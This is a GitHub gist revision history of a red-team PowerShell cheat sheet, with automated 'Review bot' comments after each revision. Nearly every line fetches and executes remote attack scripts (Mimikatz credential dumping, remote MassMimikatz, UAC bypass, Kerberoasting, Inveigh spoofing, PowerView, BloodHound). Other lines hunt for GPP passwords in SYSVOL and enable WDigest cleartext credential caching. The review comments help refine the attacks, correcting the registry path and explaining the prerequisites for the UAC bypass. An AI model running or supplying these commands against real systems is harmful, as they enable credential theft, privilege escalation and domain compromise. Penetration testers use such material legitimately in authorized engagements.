
@talshimoni
Forked from jivoi/RedTeam_CheatSheet.ps1
Created July 26, 2019 21:44

Revisions

  1. @m8sec m8sec revised this gist Jul 12, 2018. 1 changed file with 1 addition and 2 deletions.
    3 changes: 1 addition & 2 deletions RedTeam_CheatSheet.ps1
    @@ -1,6 +1,5 @@
    # Description:
    # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages
    # of testing.
    # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

    # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
  2. @m8sec m8sec revised this gist Jul 12, 2018. 1 changed file with 6 additions and 3 deletions.
    9 changes: 6 additions & 3 deletions RedTeam_CheatSheet.ps1
    @@ -8,6 +8,9 @@ powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('h
    # Invoke-Mimikatz: Dump credentials from memory
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

    # Import Mimikatz Module to run further commands
    powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

    # Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

    @@ -20,12 +23,12 @@ powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('h
    # Invoke-Kerberoast and provide Hashcat compatible hashes
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

    # Import PowerView
    powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

    # Invoke-ShareFinder and print output to file
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

    # Import PowerView Module to run further commands
    powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

    # Invoke-Bloodhound
    powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
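Review bot: The two new `-noexit` import lines (the Mimikatz and PowerView imports) fetch and `IEX` whatever is currently on the `master` branch of a third-party repository, with no commit pinning and no integrity check, and then keep that code resident in an interactive `-exec Bypass` shell, so a pushed change or a compromised account on either repo runs in the operator's context on the target. Pin the URL to a commit SHA (`https://raw.githubusercontent.com/<org>/<repo>/<sha>/...`) or stage a vetted copy on operator-controlled infrastructure, and compare a hash of the downloaded string (e.g. `Get-FileHash -InputStream` on PowerShell 5+) before passing it to `IEX`. The same applies to every other entry in the file; a one-line warning comment at the top of the file would at least make the risk visible to whoever copies these.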

  3. @m8sec m8sec revised this gist Jul 12, 2018. 1 changed file with 10 additions and 7 deletions.
    17 changes: 10 additions & 7 deletions RedTeam_CheatSheet.ps1
    @@ -9,26 +9,29 @@ powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('h
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

    # Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

    # PowerUp: Privilege escalation checks
    powershell -exec bypass -C IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks
    powershell.exe -exec Bypass -C IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks

    # Invoke-Inveigh and log output to file
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"

    # Invoke-Kerberoast and provide Hashcat compatible hashes
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

    # Import PowerView
    powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

    # Invoke-ShareFinder and print output to file
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

    # Invoke-Bloodhound
    powershell.exe -exec bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
    powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

    # Find GPP Passwords in SYSVOL
    findstr /S cpassword $env:logonserver\sysvol\*.xml
    findstr /S cpassword %logonserver%\sysvol\*.xml
    findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)

    # Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
    runas /user:DOMAIN\USER /noprofile powershell.exe
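Review bot: The `(cmd.exe)` label appended to the new findstr line is part of the command rather than a comment, so findstr will treat it as a second file argument and report that it cannot open `(cmd.exe)`; the annotation belongs in the comment, e.g. `# Find GPP Passwords in SYSVOL (first line: PowerShell, second line: cmd.exe)` with the command left as `findstr /S cpassword %logonserver%\sysvol\*.xml`. The case normalization in this revision also leaves the Inveigh switches `–NBNS`, `–mDNS` and `–Proxy` with what appear to be en-dashes rather than ASCII hyphens; PowerShell itself accepts Unicode dashes, but they are easily mangled when pasted through cmd.exe or a different code page, so normalizing them to `-NBNS -mDNS -Proxy` would make that line robust.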
  4. @m8sec m8sec revised this gist Jul 12, 2018. 1 changed file with 3 additions and 0 deletions.
    3 changes: 3 additions & 0 deletions RedTeam_CheatSheet.ps1
    @@ -2,6 +2,9 @@
    # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages
    # of testing.

    # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

    # Invoke-Mimikatz: Dump credentials from memory
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
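Review bot: The comment on the new Invoke-BypassUAC line promises an Administrator prompt but does not say who can use it: as with UAC bypasses generally, this presumably only elevates a user who is already a member of the local Administrators group running at medium integrity, and does nothing for a standard user, which is the first thing an operator copying it needs to know. Suggested comment: `# Invoke-BypassUAC: spawn a high-integrity PowerShell [requires an account that is already a local admin; this bypasses the UAC prompt, it does not escalate a standard user]`. Like the other entries it executes whatever is currently on the Empire `master` branch; pinning a commit SHA would remove that dependency.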

  5. @m8sec m8sec revised this gist Jul 12, 2018. 1 changed file with 1 addition and 0 deletions.
    1 change: 1 addition & 0 deletions RedTeam_CheatSheet.ps1
    @@ -25,6 +25,7 @@ powershell.exe -exec bypass -C "IEX(New-Object Net.Webclient).DownloadString('ht

    # Find GPP Passwords in SYSVOL
    findstr /S cpassword $env:logonserver\sysvol\*.xml
    findstr /S cpassword %logonserver%\sysvol\*.xml

    # Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
    runas /user:DOMAIN\USER /noprofile powershell.exe
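Review bot: The new `%logonserver%` form is cmd.exe syntax — PowerShell does not expand `%VAR%`, so pasted into a PowerShell session (which is what a `.ps1` cheat sheet implies) it searches a literal `%logonserver%\sysvol\*.xml` path and finds nothing, while the `$env:logonserver` line above it is the PowerShell form. Mark the distinction in the comment rather than leaving two near-identical lines: `# Find GPP Passwords in SYSVOL ($env:logonserver from PowerShell, %logonserver% from cmd.exe)`.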
  6. @m8sec m8sec created this gist Jul 12, 2018.
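--- /dev/null
+++ b/RedTeam_CheatSheet.ps1
@@ -0,0 +1,34 @@
+# Description:
+# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages
+# of testing.
+
+# Invoke-Mimikatz: Dump credentials from memory
+powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
+
+# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
+powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
+
+# PowerUp: Privilege escalation checks
+powershell -exec bypass -C IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks
+
+# Invoke-Inveigh and log output to file
+powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
+
+# Invoke-Kerberoast and provide Hashcat compatible hashes
+powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
+
+# Invoke-ShareFinder and print output to file
+powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
+
+# Invoke-Bloodhound
+powershell.exe -exec bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
+
+# Find GPP Passwords in SYSVOL
+findstr /S cpassword $env:logonserver\sysvol\*.xml
+
+# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
+runas /user:DOMAIN\USER /noprofile powershell.exe
+
+# Insert reg key to enable Wdigest on newer versions of Windows
+reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1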
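Review bot: The registry path on the last line is misspelled — `Contro` instead of `Control` — so `reg add` simply creates an unrelated key under `HKLM\SYSTEM\CurrentControlSet\Contro\...` and the WDigest setting is never changed; the line should read `reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f` (the `/f` avoids the overwrite prompt when the value already exists). The PowerUp entry is the only one whose `-C` argument is not wrapped in double quotes and it uses curly quotes (‘ ’) around the URL; that presumably works when typed directly into PowerShell, which accepts Unicode quotes, but it breaks if the text is mangled by another shell or code page, so use `'...'` and wrap the command in `"..."` like the other entries. The Invoke-MassMimikatz entry pipes `'$env:COMPUTERNAME'` in single quotes inside the inner command, which is only expanded if the outer shell is PowerShell; from cmd.exe the literal string `$env:COMPUTERNAME` is piped, so the comment should say the placeholder must be replaced rather than relying on the expansion.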